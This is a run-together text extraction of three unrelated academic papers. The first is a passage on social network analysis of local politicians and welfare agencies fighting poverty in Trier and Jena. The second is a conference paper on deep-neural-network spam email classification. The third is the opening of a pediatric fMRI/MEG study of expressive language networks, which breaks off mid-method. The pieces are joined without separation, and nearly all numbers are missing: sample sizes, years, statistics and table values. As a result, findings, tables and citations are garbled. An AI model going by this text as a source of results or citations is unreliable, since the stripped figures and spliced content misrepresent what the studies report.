worked at the department of political science, university of trier. isabelle does research in political organizations and parties, comparative politics, and information technology/digitalization and politics. acknowledgements this research was funded by the german research foundation (dfg) within the project “po- litical representation of poverty by political parties in germany” of the collaborative re- search centre (crc) at trier university, germany. the author wishes to thank dimitris christopoulos for his recommendations and markus gamper, linda reschke and peter starke for their remarks on earlier versions of the paper. connections a visual data collection method | volume | issues & | insna.org . introduction poverty and social exclusion are pressing social issues in advanced and industrial- ized countries, such as germany. in ger- many, these issues are becoming more vis- ible through a public discussion of the german social security reform program ‘hartz iv’ or the poverty of children. for german local communities, the fields of poverty prevention and fighting against al- ready existing poverty structures pose a va- riety of challenges. officially, local institu- tions are responsible for a majority of so- cial benefits and their distribution. the in- terplay between different political actors and actors from civil society requires net- working, cooperation and coming to agreements at various levels. it is exactly this process, and the accompanying rela- tions and connections, which make munic- ipal efforts to fight poverty in germany an interesting field for political science; a field which has hardly been explored in terms of networking structures. this is surprising, because municipalities are es- pecially restricted in their actions and ca- pabilities and depend on the cooperation and involvement from the civil sector, which is a challenge specifically visible in the area of fighting poverty. the thematic aim of this paper is to capture the local network of political par- ties and welfare agencies regarding pov- erty, and to explore whether there are dif- ferences concerning homophily and bro- kerage between politicians and welfare workers. the research question is: how exactly are local political actors connected with organisations from civil society? the methodological goal is to show that social network analysis is well suited to statistically represent the relations be- tween local politicians and welfare agen- cies. additionally, the findings demon- strate that visual data collection allows for a simultaneous validation of data through the participation of the subject group. as a result, it can be illustrated how a visual in- quiry through digital networking maps en- ables a collection of quantitative data that can then be evaluated (gamper et al., ). lastly, it will be assessed how use- ful the method of visually surveying quan- titative data can be for the research field of local politics. here, the question is: which advantages and disadvantages emerged for participants during the survey because of structured and standardized digital network maps? . state of research and theoretical framework some studies exist that take a closer look at the state of the german local level and its existing structures of decision-making. however, social network analysis has not been significantly featured in these works (heinze & voelzkow, ; helbling, egli, & matter, ; fowler, ; ohm, ; werner, ). instead, the intent of this research is to offer a comparative look at the structures of fighting poverty at a lo- cal level by analysing the networks be- tween local politicians, welfare agencies and domestic associations. one exception to achieve this is the work of sören peter- mann ( ). he has studied the political influence of local politicians in the context of a social capital model in major cities, medium-sized cities and counties (peter- mann, , p. ). he wanted to show how the social capital (burt, ; cole- man, ) of established politicians in the municipality (mayor, county commission- er, parliamentary party leaders) affects their political influence within the local power structures. here, he measured the centrality of the actors and their broker po- sition in egonetworks (petermann, , p. , ). moreover, he calculated regres- sion models to estimate the social capital of politicians within interaction networks and found out that finding consensus and bargaining in networks depend on politi- cians’ prestige in the cities (ibid., p. ). in methodological concerns, he showed that local top politicians are highly con- nected within their community, but admits that his studied networks focused on strong ties and interactions within cities. howev- a visual data collection method connections insna.org | issues & | volume | er, no studies exist that explicitly focus on the field of poverty at the local level in germany. the study introduced here is meant to, at least partially, fill this academ- ic void. this study draws from bourdieu’s social capital theory (bourdieu, ; coleman ; lin, cook, & burt, ), because social capital enables inclusion in social networks, and entering social rela- tionships based on access to material and immaterial resources and support from other people (crossley et al. , p. – ). at this point, it is assumed that social capital can be an individual, as well as a collective good. in institutionalized rela- tionships, resources can be tapped, which can prove beneficial for the individual, as well as for the collective. here, it is helpful to understand networks as fields, in which social capital is distributed and exchanged (bourdieu, ). because one group dis- tinguishes itself from its outside, the pre- sent article is based on the assumption that, according to reciprocal recognition and re- inforcement, similar and homogenous ac- tors are to be found in local networks (bourdieu, ). consequently, the study is based on the following premises: the in- terrelationship between local party activ- ists, city administration and welfare agency officials serves as the exchange and foster- ing of one’s social capital. depending on how much social capital an ego can accu- mulate, meaning how many potential communicative relations it has, it is more likely to be able to articulate its interests and act inclusively at the political level. another, more special, type of capital is in- formation, because it is passed on through weak ties (granovetter, ) within, and between, networks. this research is guided by asking about the cooperation of political parties, welfare agencies and the administration: how are these networks structured? what kind of different or similar actors can be found in these networks, how many of them are there and what is their function? two hypotheses serve as guidelines: first: if actors from different areas are represented in a network, heterophile networks would contain more social capi- tal. this is based on the assumption that welfare agencies and domestic associations represent poverty-stricken people, because of their institutional foundation, and are, therefore, potential contacts for politicians. consequently, their networks should be bigger and presumably denser and more heterophilic. networks can be considered homophilic if alteri (network contacts and nodes), which resemble the ego and its fea- tures, are placed in the areas where the people questioned are supposed to locate their contacts (lin, cook, & burt, ; pfenning & pfenning, , p. ). these three characteristics of networks (size, density, and homophily) will be calculated individually in this case. second: due to their function and position as representatives of the people, officials of political parties have higher brokerage values than representatives of welfare and domestic agencies. a person, who is located in a defining interface of the network, is called a broker. brokerage is comparatively operationalized via the number of subgraphs in each egonetwork (burt, ). the more subgraphs that are in an egonetwork, the higher the ego bro- kerage value. . methodology for this study, egonetworks were collected and analysed (fischer et al., ; well- man & leighton, ; crossley et al. ). because egonetworks explain rela- tions between the ego and its alteri, they reflect the individual “bounded rationality” of actors. the qualitative approach to net- works that gained attention recently (bel- lotti ; hollstein ) proved to be the best way to access the discussed field of research. benefitting from qualitative sna, a mixed methods design was real- ized based on visual network maps with targets (crossley et al. , p. ). in this case, the program vennmaker was used to collect data visually through network maps connections a visual data collection method | volume | issues & | insna.org (kahn & antonucci, ). this software allows an immediate visualization of the participant’s network during the conversa- tion. additionally, network structures can be immediately validated by repeated and clarified questions during the interview process. the emphasis, therefore, lies on the qualitative aspects of respondents’ networks. complementary, or, depending on the question, primarily, quantitative da- ta can be calculated by standardizing and structuring the network maps prior to the interview, so that results can be compared. overall, the use of vennmaker is a stand- ardized collection, in which alteri attrib- utes, for example importance, type of rela- tionship, etc., are visualized through the program and are quantitatively recorded and standardized. this visual collection method combines qualitative and quantita- tive approaches and integrates both (hollstein , p. – ). the elicitation for this research was embedded in “tradi- tional”, in-depth expert interviews (bogner, littig, & menz, ). regarding the sampling parties, welfare agencies and domestic associations at the local level in an east german city (jena) and a city in west germany (trier) were chosen. both cities are home to a university, are of similar size, are of a similar socio- economic structure, and have to tackle similar challenges in areas of deprivation, which is what makes them participants of the federal “social city program”. accordingly, a systematic prob- ability method was chosen to approach representative position holders in the field: the chairmen or executive directors of as- sociations and charities were interviewed and their political counterparts, the party leaders, faction leaders, or the politicians who had social policies as their main fo- cus. by then using the snowball-approach (babbie, , p. ), other central actors were included in the course of the process. the sample includes egonetworks in to- tal. for jena, the sample includes six asso- ciation representatives, party represent- atives and one city administrator. for trier, five association representatives are included, as well as nine party representa- tives and two city administrators. alto- gether, women and men between and years were represented. for four networks, not all data is available, and for three networks, interview effects can be assumed, which were conducted by anoth- er interviewer. the networks of admin- istration officials were not included, be- cause they represent a functional group of only three egos, and thus too small for an intended mean value comparison. the egonetworks were established together with the respondents using the “free net- work drawing” function of vennmaker based on targets. for the networks, alteri were collected through a name generator, in order to functionally separate the field (burt, ; campbell & lee, ). for this analysis, the question asked focused explicitly on relationships of professional information exchange: “now i am curious about the people with whom you work to- gether in the field of fighting poverty. if you could give me a specific example, for instance, who do you contact or ask for help when you administer benefits?” the generator was connected to qualitative guiding questions of the expert interview with the intention to reveal rele- vant cooperation: most of the time, partic- ipants named organisations important to them in the course of the qualitative expert interview. these organisations were noted, and the participant would be asked, with which individuals from these organisations she worked together with in the field of welfare. the named alteri were then drawn in vennmaker, together with the interview partner, in a visually-participatory manner. afterwards, the name interpreters were queried, which generated standardized in- formation regarding the alteri and their re- lations to ego. the nature of the relation- ship between the ego and its alteri is col- lected through the interpreters, as well as alter-alter relationships. interpreters, com- prised of several common measures, such as the duration of contact, frequency of contact and the type of contact, the im- portance of alteri for the ego (visualized as a visual data collection method connections insna.org | issues & | volume | the size of alteri), function, party member- ship, age and gender, were used. interpret- ers were operationalized as follows: con- tact frequency: = very often (daily, week- ly), = often (up to three months), = sel- dom (once or twice a year); duration of contact: = – years, = – years, = – years, = – years, = more than years; type of contact (personal, via phone, via mail, email, cell phone). the visual collection and participa- tory positioning together with the partici- pants proved to be very beneficial for both sides. at no point in time did the partici- pants feel as if they were producing the type of quantitative data, which is usually the case with questionnaires when collect- ing network data. plus, this collection pro- cedure is not as time consuming as the classic approach. this method is, therefore, especially interesting for smaller and more sensitive research fields, and leads to equally valid results. in the course of the processing of the digital network map, it became appar- ent that categorical variables, such as fre- quency of contact, age or duration of con- tact, can be collected very well through the additionally configurable ‘actors chart’ in vennmaker, which is comparable to a questionnaire, meaning these were not added visually, but via a catalogue of ques- tions that can be called upon in the pro- gram. instead, the form and formalization of cooperation was represented through re- lations, and afterwards the drawings were complemented with this information to- gether with participants. here, varying forms of relations were offered to depict multiplexity, from which the participant could select the most fitting for the present relationship in their perception (see figure ). figure : visualization example of the operational- ization source: collection, calculation and figure by the author to distinguish those multiplex rela- tionships, several forms for collaboration were drawn with one alter. more specifi- cally, these were the exchange of infor- mation and experiences (turquoise), ex- change or procurement of means (finan- cially and otherwise; blue), planning and implementation of concrete measures (pur- ple) and timely loose or sporadic (orange), as well as institutionalized and formalized cooperation (green). the alteris’ colours represent party membership in line with parties’ colours or non-partisanship (white). via three concentric circles, the accessibility of alteri was classified from “very good” to “less good” (see figure ). the sectors, meaning the circle segments in different grey shades, illustrate the areas of the municipality: political parties, city administration, agencies, charities and as- sociations, businesses, unions, media. for the quantitative analysis, the collected re- sults were controlled and processed in ex- cel through the export function of the pro- gram. afterwards, the network parameters and measures for homophily and brokerage were calculated by using ucinet; here, the calculation of density was balanced with the one from vennmaker. as a third factor, apart from size and density, ho- mophily was calculated using the ei-index. this index carries out values from − to ; connections a visual data collection method | volume | issues & | insna.org meaning heterophily and − standing for homophily: the lower the value, the more homophilic the network. in order to com- pare the networks amongst each other, in terms of their homophily, this research takes the indices of the entire network into account. finally, the comparison of mean values was calculated with a parametric test in spss. . empirical findings when looking at the network size, politi- cians have a slightly bigger network than the association representatives. the larger the network, the lower the density (borgat- ti & everett, ). for both groups, dif- ferences could be found in density rather than in size. a comparison of the networks of party representatives regarding the ei- index reveals that the networks show the entire spectrum of ei. for the mean value, all networks are located in the homophile field of the index, yet the networks of party representatives are more heterophilic at − . (sd = . ) than those of the as- sociation representatives at − . (sd = . ) (see table ). thus, politicians have more heterophilic networks in terms of lo- cating alteri in sectors. the mean values show that the association networks display less varied values than the ones of the poli- ticians. therefore, politicians act as infor- mation intermediaries according to the second hypothesis, which stated politicians enjoy a kind of monopoly regarding the passing of information, which is operation- alized through the number of subgraphs. table : comparison of the mean value for size, density, ei-index and subgraphs collection, calculation and figure by the author. significance level at . . the difference in the amount of subgraphs from . (parties) to on average (as- sociations) indicates that association repre- sentatives seem to have the higher broker- age power, and hypothesis two is rejected. the t-test was only relevant for the density. regarding the number of subgraphs and function, the mean value comparison was not significant (see table ). since the dif- ference of the mean values for density is accidental by up to per cent, a very low effect between density and function may the purely star-networks (no. , , , , ) were excluded here. exist. as a result, one can state that the networks of the association representatives contribute more to the inclusion of affected interests than those of the party representa- tives. contrary to this, the politicians’ net- works seem more secluded, due to their slight homogenous constitution. . conclusion the thematic aim of this contribution was to illustrate the network structure between local politicians and welfare associations in poverty politics. the networks of stud- ied egos were quantified and explicated with different variables (size, density, ho- mophily, and subgraphs). the first hypoth- esis could be partially validated, because the networks of association representatives were denser and slightly more heterophilic function size density ei-index via sector affiliation number of subgraphs party (n= ) mean . . − . . sd . . . . association (n= ) mean . . − . . sd . . . . total (n= ) mean . . − . . sd . . . . significance (n= ) t . . . . squared eta (n= ) ŋ . . . . a visual data collection method connections insna.org | issues & | volume | than those of party representatives. re- garding the second hypothesis, results show that party representatives have larger networks, yet these networks split into fewer subgraphs than the networks of as- sociation representatives. in terms of methodology, the aim was to show how digital network maps fa- cilitate collecting and analysing quantita- tive data. for this, data collection with vennmaker has proven to be very effec- tive. structures and the manifestations of relations with the associations, as well as alteri-characteristics were standardized; here, the scaling and classification of cate- gories was very time-consuming. the posi- tioning of the alteri could be singled out from vennmaker for the quantitative cal- culations presented here. insofar, it was as- sured that the shown network structure was also depicted in the quantitative data set. sketching the networks together with the interview partners allowed a direct captur- ing of the inherent thought processes of the participants during the conversation. while this may have led, in some cases, to very confusing network maps, the fact that par- ticipants could see their networks structur- ally visualized proved to be interesting and surprising to them. this also prevented boredom or frustration from emerging dur- ing the collection of alter-alter-relations (mccarty, killworth, & rennell, ). the joint sketching caused participants to become more interested in the inquiry, and it was possible to illustrate the structure of their professional networks for them. such a combined approach is currently without equal because a simultaneous positioning of the alteri and validation of network structures on a visual network map is a clear advantage of the program, whereas the analysis for statistical calculations had to be done with other programs. conse- quently, vennmaker had an interface func- tion for the quantitative part of the study. the collection and processing of data was enabled and highly facilitated, in particu- lar, because of the program. compared to this, the processing and calculating of pa- rameters, especially the ei-index and the ttest, was elaborate and tedious in uci- net. the data collected and exported with vennmaker was further analysed, or man- ually edited in other programs. here, spss was fitting for the hypotheses tests. initial- ly, vennmaker caused the most problems in the beginning of the analysis compared to the other programs. this was mainly be- cause the software was first used as a be- taversion in the research project and later on in the . -version. these two versions already differed greatly in their usage, es- pecially the statistics functions, which were needed for a smooth export and fur- ther analysis: they were in need of further development. for the collection of network data, vennmaker has proven successful in an interview setting. as a result, the meth- od of using digital network cards is well suited for the visual-participatory collec- tion of egonetworks together with partici- pants. the possibility of sketching the network and the following revision with the participants should be emphasized as a positive feature. by proceeding this way, the interpretations of the interview partner could be directly included and analysed quantitatively afterwards. because of that, a distortion by the researcher can be mini- mized, and, almost in passing, quantitative data can be collected. it could, therefore, be demonstrated that visual collection in- struments are well suited to gather and evaluate quantitative data. references babbie, e. r. ( ). the practice of social research ( th ed.). belmont, ca: wadsworth cengage learning. bellotti, e. ( ). what are friends for?: elective communities of single people. social networks, ( ), – . doi: . /j.socnet. . . bogner, a., littig, b., & menz, w. (eds.). ( ). re- search methods series. interviewing experts. ba- singstoke [england], new york: palgrave macmil- lan. borgatti, s. p., & everett, m. g. ( ). network analysis of -mode data. social networks, ( ), – . doi: . /s - ( ) - bourdieu, p. ( ). the genesis of the concepts of habitus and field. sociocriticism, ( ), – . bourdieu, p. ( ). the forms of capital. in j. g. richardson (ed.), handbook of theory and re- connections a visual data collection method | volume | issues & | insna.org search for the sociology of education (pp. – ). new york: greenwood press. burt, r. s. ( ). structural holes: the social struc- ture of competition ( nd ed.). cambridge, mass.: harvard university press. burt, r. s. ( ). a note on social capital and net- work content. social networks, ( ), – . doi: . /s - ( ) - campbell, k. e., & lee, b. a. ( ). name genera- tors in surveys of personal networks. social net- works, ( ), – . doi: . / - ( ) -f coleman, j. s. ( ). social capital in the creation of human capital. the american journal of sociolo- gy, , – . crossley, n., bellotti, e., edwards, g., everett, m. g., koskinen, j. & tranmer, m. ( ). social net- work analysis for ego-nets. los angeles: sage. fischer, c. s., stueve, c., jones, l. m., jackson, r. m., gerson, k., & baldassare, m. ( ). net- works and places: social relations in the urban setting. new york: free press. gamper, m., schönhuth, m., & kronenwett, m. ( ). bringing qualitative and quantitative data together – collecting and analyzing network data with the help of the software tool vennmaker. in h. safar, m. safar, & k. a. mahdi (eds.), social networking and community behavior modeling: qualitative and quantitative measures. qualita- tive and quantitative measures. hershey: infor- mation science reference. granovetter, m. s. ( ). the strength of weak ties. american journal of sociology, ( ), – . heinze, r., & voelzkow, h. ( ). kommunalpolitik und verbände: inszenierter korporatismus auf lokaler und regionaler ebene? in h. heinelt & h. wollmann (eds.), stadtforschung aktuell: vol. . brennpunkt stadt. stadtpolitik und lokale politikforschung in den er und er jahren (pp. – ). basel: birkhäuser. helbling, m., egli, s., & matter, s. ( ). lokale eliten und kommunale politiknetzwerke - einflussreiche akteure in der einbürgerungspolitik einer schweizer gemeinde. in u. serdült (ed.): vol. nr. . zürcher politik- & evaluationsstudien, anwendungen sozialer netzwerkanalyse. beiträge zur tagung vom . und . oktober (pp. – ). zürich: institut für politikwissenschaft. forschungsbereich policy-analyse und evaluation. hollstein, b. ( ). qualitative approaches. in p. j. carrington & j. scott (eds.), the sage handbook of social network analysis (pp. – ). london: sage. hollstein, b. ( ). mixed methods social networks research: an introduction. in s. domínguez & b. hollstein (eds.), structural analysis in the social sciences: vol. . mixed methods social networks research. design and applications (pp. – ). new york: cambridge univ. press. fowler. james h. ( ). connecting the congress: a study of cosponsorship networks. political anal- ysis, ( ), – . retrieved from . /pan/mpl kahn, r. l., & antonucci, t. c. ( ). convoys of life course: attachment, roles, and social support. in p. b. baltes & o. g. brim (eds.), life-span de- velopment and behavior (pp. – ). new york: academic press. lin, n., cook, k. s., & burt, r. s. ( ). social cap- ital: theory and research. new york: aldine de gruyter. retrieved from http://www.worldcat.org/oclc/ mccarty, c., killworth, p. d., & rennell, j. ( ). impact of methods for reducing respondent burden on personal network structural measures. social networks, ( ), – . doi: . /j.socnet. . . ohm, a. ( ). die machtstruktur kommunaler entscheidungsträger - eine netzwerkanalyse. in v. schneider & f. janning (eds.), politiknetzwerke. modelle, anwendungen und visualisierungen (pp. – ). wiesbaden: vs verlag für sozialwissenschaften. petermann, s. ( ). soziale netzwerke und politischer einfluss von kommunalpolitikern. in w. matiaske & g. grözinger (eds.), sozialkapital. eine (un)bequeme kategorie (pp. – ). marburg: metropolis-verlag. pfenning, u., & pfenning, a. ( ). egozentrierte netzwerke: verschiedene instrumente - verschiedene ergebnisse. zuma nachrichten, ( ), – . retrieved from http://www.ssoar.info/ssoar/files/ / /zuma- nachrichten_ _ _ - .pdf wellman, b., & leighton, b. ( ). networks, neighborhoods and communities: approaches to the study of the community question. toronto: centre for urban and community studies and the dept. of sociology, university of toronto. werner, w. ( ). armut und obdachlosigkeit in der kommune. in h. wollmann & r. roth (eds.), kommunalpolitik – politisches handeln in der gemeinde ( nd ed., pp. – ). opladen: westdeutscher verlag. international conference on sensor network and computer engineering (icsnce ) research of email classification based on deep neural network wang yawen school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com yu fan a , wei yanxi b school of computer science and engineering xi’an technological university xi’an, , china e-mail: a @qq.com b @qq.com abstract—the effective distinction between normal email and spam, so as to maximize the possible of filtering spam has become a research hotspot currently. naive bayes algorithm is a kind of frequently-used email classification and it is a statistical-based classification algorithm. it assumes that the attributes are independent of each other when given the target value. this hypothesis is apparently impossible in the email classification, so the accuracy of email classification based on naive bayes algorithm is low. in allusion to the problem of poor accuracy of email classification based on naive bayes algorithm, scholars have proposed some new email classification algorithms. the email classification algorithm based on deep neural network is one kind of them. the deep neural network is an artificial neural network with full connection between layer and layer. the algorithm extracted the email feature from the training email samples and constructed a dnn with multiple hidden layers, the dnn classifier was generated by training samples, and finally the testing emails were classified, and they were marked whether they were spam or not. in order to verify the effect of the email classification algorithm based on dnn, in this paper we constructed a dnn with hidden layers. the number of nodes in each hidden layer was . when the training set was trained, we set up batches, and each batch has trained data. we used the famous spam base dataset as the data set. the experiment result showed that dnn was higher than naive bayes in the accuracy of email classification when the proportion of the training set was %, %, %, % and % respectively, and dnn showed a good classification effect. with the development of science and technology, spam manifests in many forms and the damage of it is more serious, this puts forward higher requirements for the accuracy of spam recognition. the focus of next research will be combining various algorithms to further improve the effect of email classification. keywords-deep neural networks; spam email; classification; naive bayes; spambase data set i. introduction email has become a major way of communication for people at present, but the problem of spam comes behind. the harm of spam is mainly manifested as the following aspects: occupying bandwidth, leading to the congestion of the email server and reducing the efficiency of the network; consuming the time of the user and affecting the work efficiency. therefore, the effective distinction between normal email and spam, so as to maximize the possible of filtering spam has become a research hotspot currently. naive bayes algorithm is a kind of frequently-used email classification and it is a statistical-based classification algorithm[ - ], which has the characteristics of simple realization and fast classification. however, it assumes that the attributes are independent of each other when given the target value[ ].this hypothesis is apparently impossible in the email classification, so the accuracy of email classification based on naive bayes algorithm is low. in allusion to the problem of poor accuracy of email classification based on naive bayes algorithm, scholars have proposed some new email classification algorithms. the mailto: @qq.com file:///d:/programdata/youdao/dict/ . . . /resultui/dict/ file:///d:/programdata/youdao/dict/ . . . /resultui/dict/ international conference on sensor network and computer engineering (icsnce ) email classification algorithm based on deep neural network (dnn) is one kind of them. ii. theoretical basis the basic concept of artificial neural network is based on the hypothesis and model construction of how the human brain responds to complex problems[ - ]. the deep neural network is an artificial neural network with full connection between layer and layer, and its structure is shown in figure .the full connection between layer and layer means that any neuron in the layer must be connected to any of the neurons in the layer.although the deep neural network looks complex, it is still the same as the perceptron from a small local model. input layer hidden layer hidden layer hidden layern output layer figure . structure diagram of deep neural network we use l jk w to respresent the weight coefficient between the neuron in the layer and the neuron in the layer, l j b to represent the bias of the neuron in the layer, to represent the activation value of the neuron in the layer. we can get the following relationship between the activation value of the neuron in the layerand the activation value of all neuron sin the layer:   we assume that l w is the weight coefficient matrix of all the neurons in the layer, l b is the bias matrix of the layer, l a is the activation value of the layer, l z is the weighted input of all neurons in the layer, then l jk w is the weight coefficient of row j, column k. the relationship between the activation value of the layer and the activation value of the layer can be expressed by the following matrix relationship:       here respresents the non-linear activation function of the nodes on the hidden layers, and the traditional dnn uses sigmoid function usually, as shown in expression ( ).because the sigmoid function has properties such as monotone increasing and its inverse function has the property of monotone increasing, it is often used as a threshold function of neural networks, it maps the variables between and .the sigmoid function curve is shown in figure :  figure . the sigmoid function curve iii. algorithm description implementation process of mail classification algorithm based on deep neural network was shown in figure . international conference on sensor network and computer engineering (icsnce ) read the contents of the email for training and extract the email features for training construct a dnn containing multiple hidden layers, set the number of hidden layers ,set the number of nodes on each layer, set training batches and the number of training data for each batch train dnn to generate dnn classifier use the dnn classifier to classify the testing email and mark whether they are spam read the contents of the email for testing and extract the email features for testing begin end compare the classification result of the email with the actual tag, verify the correctness of the algorithm figure . algorithm execution process step : read the contents of the email for training from the spam base dataset and extract the email features for training such as word_freq_, char_freq_, capital_run_length_average, capital_run_length_longest, capital_run_length_total, and so on. step : construct a dnn containing multiple hidden layers, set the number of hidden layers(n_classes) ,set the number of nodes on each layer (hidden_units) ,set training batches( steps) and the number of training data for each batch (batch_size). step : train dnn to generate dnn classifier. step : read the contents of the email for testing from the spambase data set and extract the email features for testing such as word_freq_, char_freq_, capital_run_length_average, capital_run_length_longest, capital_run_length_total, and so on. step : use the dnn classifier to classify the testing email and mark whether they are spam( or ). step : compare the classification result of the email (y_predict) with the actual tag(y_test), calculate the accuracy of the algorithm in the email classification(accuracy_score) and verify the correctness of the algorithm. iv. experimental results and analysis in order to verify the effect of the email classification algorithm based on dnn, in this paper we constructeda dnn with hidden layers. the number of nodes in each hidden layer was . when the training set was trained, we set up batches, and each batch has trained data. we used the famous spambase dataset as the data set, which was from the uci machine learning library at the university of california, usa. the specific situation is shown in table i. we compared the two kinds of email filtering algorithms of dnn and naive bayes with accuracy, which is the main evaluation standard of email filtering technology. the accuracy is defined as follows: emails of number total email identified correctly of number accuracy   we did five groups of experiments in this paper.the selection case of training set and testing set in each experiment is shown in table ii. international conference on sensor network and computer engineering (icsnce ) table i. spambase data set index value index value total number of the email number of attributes number of email category labels email category validemail,spam email number of the spam email the proportion of spam email . % number of the valid mail the proportion of validemail . % table ii. the selection case of training set and testing set group number the proportion of the training set in all data the number of email in training set the proportion of the testing set in all data the number of email in testing set % % % % % % % % % % the experimental results were shown in figure . figure . the comparison of accuracy of the two algorithms the experiment result showed that dnn was higher than naive bayes in the accuracy of email classification when the proportion of the training set was %, %, %, % and % respectively, and dnn showed a good classification effect. v. conclusion the application of email classification algorithm based on deep neural network is studied in this paper. the algorithm constructed multiple hidden layers and generated dnn classifiers through training. the experiment results showed that the accuracy of the algorithm is obviously higher than the naive bayes algorithm. with the development of science and technology, spam manifests in many forms and the damage of it is more serious, this puts forward higher requirements for the accuracy of spam recognition. the focus of next research will becombining various algorithms to further improve the effect of email classification. acknowledgments new network and detection control national joint engineering laboratory fund program (gsysj ). xi’an technological university principal scientific research fund project: xagdxjj- international conference on sensor network and computer engineering (icsnce ) reference [ ] cao cuiling, wang yuanyuan and yuan ye, “research of a spam filter based on improved naive bayes algorithm, ”chinese journal of network and information security, vol. no. , pp. - , march . [ ] wang zhiyong and liu hongmei, “design and implementation of bayesian spam filte R ing system,” journal of inner mongolia agricultural university(natural science edition), vol. no. , pp. - , may. . [ ] wang qingsong and wei ruyu, “bayesian chinese spam filtering method based on phrases,” computer science, vol. no. , pp. - , apr . [ ] neural networks and deep learning [eb/ol]. http://neuralnetworksanddeeplearning.com. [ ] li kun, chai yumei and zhao hongling, “estimation of fetal weight based on deep neural network,” computer science, vol. no. a, pp. - , nov . [ ] cao meng, li hongyan and zhao rongrong, “a pitch detection method based on deep neuralnetwork,” microelectronics & computer, vo . no. , pp. - , june . [ ] ren rongrong, zhou mingquan and geng guohua, “the multi-scale features extraction method based on deep neural network”, journal of northwest university(natural science edition), vol. no. , pp. - , apr . [ ] s.l.zhang research on deep neural networks based models for speech recognition(ph.d., university of science and technology of china, china ), p. brain- - -ver -kadis_ p .. characterizing information flux within the distributed pediatric expressive language network: a core region mapped through fmri-constrained meg effective connectivity analyses darren s. kadis, – andrew dimitrijevic, – claudio a. toro-serey, mary lou smith, , and scott k. holland , , , abstract using noninvasive neuroimaging, researchers have shown that young children have bilateral and diffuse language networks, which become increasingly left lateralized and focal with development. connectivity within the distributed pediatric language network has been minimally studied, and conventional neuroimaging approaches do not distinguish task-related signal changes from those that are task essential. in this study, we propose a novel multimodal method to map core language sites from patterns of information flux. we retrospectively analyze neuroimaging data collected in two groups of children, ages – years, performing verb generation in functional magnetic resonance imaging (fmri) (n = ) and magnetoencephalography (meg) (n = ). the fmri data were conventionally analyzed and the group activation map parcellated to define node locations. neuronal activity at each node was estimated from meg data using a linearly constrained minimum variance beamformer, and effective connectivity within canonical frequency bands was computed using the phase slope index metric. we observed significant ( p £ . ) effective connections in all subjects. the number of suprathreshold connections was significantly and linearly correlated with participant’s age (r = . , n = , p £ . ), suggesting that core language sites emerge as part of the normal developmental trajec- tory. across frequencies, we observed significant effective connectivity among proximal left frontal nodes. within the low frequency bands, information flux was rostrally directed within a focal, left frontal region, approximating broca’s area. at higher frequencies, we observed increased connectivity involving bilateral perisylvian nodes. frequency- specific differences in patterns of information flux were resolved through fast (i.e., meg) neuroimaging. key words: broca’s area; causal network; children; functional magnetic resonance imaging; linearly constrained minimum variance beamformer; magnetoencephalography; multimodal; parcellation; phase slope index introduction normal developmental changes in gross languagerepresentation have been well characterized using noninvasive neuroimaging. with functional magnetic res- onance imaging (fmri), and more recently, magnetoen- cephalography ( meg), researchers have shown that healthy young children have bilateral and diffuse lan- guage networks, which become increasingly left later- alized and focal with development (brown et al., ; holland et al., ; kadis et al., ; ressel et al., ). pediatric neuroimaging research consortium, cincinnati children’s hospital medical center, cincinnati, ohio. division of neurology, cincinnati children’s hospital medical center, cincinnati, ohio. department of pediatrics, college of medicine, university of cincinnati, cincinnati, ohio. communication sciences research center, cincinnati children’s hospital medical center, cincinnati, ohio. division of pediatric otolaryngology, cincinnati children’s hospital medical center, cincinnati, ohio. department of surgery, college of medicine, university of cincinnati, cincinnati, ohio. department of psychology, university of toronto, toronto, ontario, canada. department of psychology, hospital for sick children, toronto, ontario, canada. division of radiology, cincinnati children’s hospital medical center, cincinnati, ohio. ª darren s. kadis, et al., ; published by mary ann liebert, inc. this open access article is distributed under the terms of the creative commons attribution noncommercial license (http://creativecommons.org/licenses/by-nc/ . /) which permits any noncommercial use, distribution, and reproduction in any medium, provided the original author(s) and the source are credited. brain connectivity volume , number , mary ann liebert, inc. doi: . /brain. . an early distributed network is thought to confer a pediat- ric advantage in the event of cerebral insult. adults with left perisylvian injury tend to develop severe and lasting apha- sias, whereas young children with comparable insults experi- ence minimal language disturbance and develop essentially normal language through childhood and adolescence (bal- lantyne et al., ; bates et al., ; reilly et al., ; vargha-khadem et al., ; see also, jacola et al., ; tillema et al., ). sparing of language is realized through functional engagement of the extracanonical cortex. the po- tential for both interhemispheric and intrahemispheric plas- ticity (i.e., establishment of an atypical language network) decreases with age, and relatively poor outcomes and failure to form atypical networks are seen with insults occurring after about age or years (branch et al., ; brazdil et al., ; helmstaedter et al., ; kadis et al., , ; rasmussen and milner, ; saltzman-benaiah et al., ; satz et al., ). normal developmental changes in language representation provide a compelling context in which the potential for ef- fective plasticity would be expected to decrease with age. however, the timing for establishment of adult-typical repre- sentation does not perfectly track with the clinical outcome data. in fmri, mature left lateralization and focalization of the bold activity is protracted in the developmental period, with adult-typical representation emerging in adolescence or young adulthood (e.g., szaflarski et al., ). similarly, in meg language studies, dipoles fit to average waveforms and signature oscillatory activity tend to left lateralize and focalize in the teen years (gummadavelli et al., ; kadis et al., , ; ressel et al., ). the discord suggests that conven- tional neuroimaging approaches to language mapping fail to distinguish task-correlated hemodynamic or neuronal activity from that which is task essential (i.e., necessary and sufficient for task completion). the result is relatively broad ‘‘activa- tion’’ maps for childhood function, which fail to delineate the core regions necessary for task completion. recent developments in neuroimaging technology, and particularly the high temporal resolution afforded by meg, permit assessment of neuronal population dynamics, includ- ing characterization of transient activity and estimation of causal networks. in this study, we seek to estimate informa- tion flux (directional or effective connectivity) within the distributed pediatric expressive language network. we report on findings from two groups of children completing verb generation tasks in fmri and meg. large-scale fmri data are used to provide a spatial template of task-related activa- tion. the group activation map is then segmented using a -unit random parcellation scheme (craddock et al., ), with parcel centroids used to define network node lo- cations. the neuromagnetic activity at each node is estimated from meg recordings using a beamformer, and the time courses are subjected to effective connectivity analyses using the phase slope index (psi) metric recently introduced by nolte and associates ( ). unlike many other electro- physiological metrics of effective connectivity, psi remains insensitive to mixing/volume conduction, providing robust estimates of information flux between both proximal and dis- tal node pairs. the pipeline capitalizes on the relative strengths of fmri and meg (spatial and temporal resolution, respectively) and is sensitive to the regional dynamics that is known to underlie all higher cognitive processes. method we analyze fmri and meg data that were collected for two separate studies investigating developmental changes in language representation. the participants, tasks, and data acquisition have been documented previously (holland et al., ; kadis et al., ; see also, kadis et al., ; karunanayaka et al., , ; pang et al., ) and are described only briefly below. the focus of the current study is on integration of data from the two imaging modal- ities and the novel application of effective connectivity ana- lyses for mapping a core functional network. data acquisition functional 